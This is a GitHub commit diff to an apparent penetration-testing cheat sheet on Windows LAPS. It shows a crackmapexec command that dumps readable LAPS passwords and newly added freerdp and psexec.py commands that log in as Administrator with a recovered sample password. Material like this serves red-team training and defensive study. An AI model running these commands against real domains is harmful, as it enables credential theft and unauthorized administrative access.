Update laps.md

This commit is contained in:
NoPurposeInLife 2024-07-26 03:04:39 +08:00 committed by GitHub
parent 153b61c0bc
commit d86a0655ba
No known key found for this signature in database
GPG key ID: B5690EEEBB952194

View file

@ -114,6 +114,15 @@ crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps
```
This will dump all the passwords that the user can read, allowing you to get a better foothold with a different user.
## ** Using LAPS Password **
```
freerdp /v:192.168.1.1:3389 /u:Administrator
Password: 2Z@Ae)7!{9#Cq
python psexec.py Administrator@web.example.com
Password: 2Z@Ae)7!{9#Cq
```
## **LAPS Persistence**
### **Expiration Date**